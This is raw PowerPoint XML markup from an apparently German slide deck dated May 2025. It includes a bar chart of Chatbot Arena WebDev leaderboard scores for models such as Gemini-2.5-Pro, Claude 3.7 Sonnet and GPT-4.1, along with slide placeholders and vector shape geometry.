            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-4CD3-4773-8BE1-5F78EE998934}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="461"/>
        <c:overlap val="-90"/>
        <c:axId val="1296966016"/>
        <c:axId val="1296989536"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1924473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4474159"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1924474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4473679"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="1296989536"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="r"/>
        <c:numFmt formatCode="_-[$$-409]* #,##0.00_ ;_-[$$-409]* \-#,##0.00\ ;_-[$$-409]* &quot;-&quot;??_ ;_-@_ "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6966016"/>
        <c:crosses val="max"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:catAx>
        <c:axId val="1296966016"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="1296989536"/>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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Chatbot Arena </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>WebDev</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin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Tabelle1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Spalte1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A-DEF6-4237-BF44-F27428859942}"/>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B-DEF6-4237-BF44-F27428859942}"/>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C-DEF6-4237-BF44-F2742885994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D-DEF6-4237-BF44-F27428859942}"/>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E-DEF6-4237-BF44-F27428859942}"/>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F-DEF6-4237-BF44-F27428859942}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000010-DEF6-4237-BF44-F27428859942}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>Tabelle1!$A$2:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>Gemini-2.5-Pro-Preview-05-06</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Claude 3.7 Sonnet (20250219)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Gemini-2.5-Pro-Exp-03-25</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>GPT-4.1-2025-04-14</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Claude 3.5 Sonnet (20241022)</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>DeepSeek-V3-0324</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>DeepSeek-R1</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>GPT-4.1-mini-2025-04-14</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>o3-2025-04-16</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Qwen3-235B-A22B</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Tabelle1!$B$2:$B$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>1420</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1357</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1273</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1261</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1238</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1207</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1199</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1189</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1187</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1186</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-DEF6-4237-BF44-F27428859942}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="1924545679"/>
        <c:axId val="1924546159"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="192454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4546159"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="192454615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4545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F3675C1-B356-41A2-B268-7218788D2B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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B15797-AE93-4741-96D7-21D5FFE3B9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FD49CF-F87B-4432-B107-6AB633010ADF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>10.05.2025</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767C97CD-B17A-44B7-BDE1-CEE80F9E03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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA852F1-4973-478A-BACB-3943B5F347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38BFF0-337D-4E4D-9656-3B36F2EA5899}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE">
              <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524080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1 Sans" pitchFamily="2"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1 Sans" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3A39B717-4E7F-493D-BFF4-14E7176D1A0A}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:pPr/>
              <a:t>10.05.2025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1 Sans" pitchFamily="2"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1 Sans" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AB99D008-E6EF-481D-8B3D-C9949BE2B58E}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2248354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1 Sans" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="A1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AB99D008-E6EF-481D-8B3D-C9949BE2B58E}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2867840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F99A9-466D-1341-B246-4D2C40A5C2C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3185812-F5F2-D25E-46C1-83E9D87F0A6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75B9906-1F4D-CE2E-CA3F-45167EA7C755}"/>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21C270FC-3589-8B50-6CF9-AC4294B3C08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB99D008-E6EF-481D-8B3D-C9949BE2B58E}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100039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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="!!Pattern">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341A8F45-8997-402B-948E-D3900BC8E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4185461" y="-907744"/>
            <a:ext cx="8749489" cy="3962288"/>
            <a:chOff x="4185461" y="-907744"/>
            <a:chExt cx="8749489" cy="3962288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freihandform: Form 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A98831B-38A3-41B2-9CDB-E99751664246}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11988718" y="1277822"/>
              <a:ext cx="946230" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 384028"/>
                <a:gd name="connsiteY0" fmla="*/ 218789 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 384030 w 384028"/>
                <a:gd name="connsiteY1" fmla="*/ -2989 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="384028" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384030" y="-2989"/>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3" name="Freihandform: Form 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C777CF-2A97-4BC2-9090-D83A9FE30A4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11988883" y="1551161"/>
              <a:ext cx="946067" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 383963 w 383962"/>
                <a:gd name="connsiteY0" fmla="*/ -2965 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 383962"/>
                <a:gd name="connsiteY1" fmla="*/ 218812 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="383962" h="221777">
                  <a:moveTo>
                    <a:pt x="383963" y="-2965"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="218812"/>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4" name="Freihandform: Form 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65229CD8-97F3-40D2-96FB-1457183A3DBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11988718" y="1004475"/>
              <a:ext cx="473140" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192025 w 192024"/>
                <a:gd name="connsiteY0" fmla="*/ 107914 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 192024"/>
                <a:gd name="connsiteY1" fmla="*/ -3024 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192024" h="110937">
                  <a:moveTo>
                    <a:pt x="192025" y="107914"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-302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5" name="Freihandform: Form 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7579A0A6-0EB6-408C-B87F-72F6069BC905}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11987523" y="731136"/>
              <a:ext cx="474335" cy="274278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 192509"/>
                <a:gd name="connsiteY0" fmla="*/ -3047 h 111316"/>
                <a:gd name="connsiteX1" fmla="*/ 192511 w 192509"/>
                <a:gd name="connsiteY1" fmla="*/ 108270 h 111316"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192509" h="111316">
                  <a:moveTo>
                    <a:pt x="1" y="-3047"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="192511" y="10827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24" name="Freihandform: Form 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CAEABE-BD56-4395-A228-B3ABE4A9DF79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442635" y="1960468"/>
              <a:ext cx="236570" cy="546919"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY0" fmla="*/ 163665 h 221968"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY1" fmla="*/ 53108 h 221968"/>
                <a:gd name="connsiteX2" fmla="*/ 11 w 96012"/>
                <a:gd name="connsiteY2" fmla="*/ -2931 h 221968"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY3" fmla="*/ 219038 h 221968"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96012" h="221968">
                  <a:moveTo>
                    <a:pt x="96013" y="163665"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="53108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="-2931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="21903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25" name="Freihandform: Form 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA3039E-02A3-4FA2-AE2A-714070223691}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442635" y="594229"/>
              <a:ext cx="236570" cy="1229573"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY0" fmla="*/ -3018 h 499024"/>
                <a:gd name="connsiteX1" fmla="*/ 96004 w 96012"/>
                <a:gd name="connsiteY1" fmla="*/ 440538 h 499024"/>
                <a:gd name="connsiteX2" fmla="*/ 20 w 96012"/>
                <a:gd name="connsiteY2" fmla="*/ 496006 h 499024"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY3" fmla="*/ 52356 h 499024"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96012" h="499024">
                  <a:moveTo>
                    <a:pt x="96013" y="-3018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96004" y="440538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="496006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52356"/>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26" name="Freihandform: Form 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE47A5AD-6622-4181-A5C8-80135A0E3491}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8679183" y="594229"/>
              <a:ext cx="236520" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ 52404 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ -3064 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55468">
                  <a:moveTo>
                    <a:pt x="95994" y="52404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-306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27" name="Freihandform: Form 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8909F3-0D7E-407A-A6D0-24B31583FDA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442685" y="457556"/>
              <a:ext cx="236498" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ -3076 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 52393 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-3076"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="52393"/>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29" name="Freihandform: Form 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{405E702B-6191-4F31-87CD-EDFFC8443211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6077549" y="2233814"/>
              <a:ext cx="1182519" cy="819790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 383954 w 479926"/>
                <a:gd name="connsiteY0" fmla="*/ -2896 h 332713"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 479926"/>
                <a:gd name="connsiteY1" fmla="*/ 218882 h 332713"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 479926"/>
                <a:gd name="connsiteY2" fmla="*/ 329817 h 332713"/>
                <a:gd name="connsiteX3" fmla="*/ 479928 w 479926"/>
                <a:gd name="connsiteY3" fmla="*/ 52571 h 332713"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
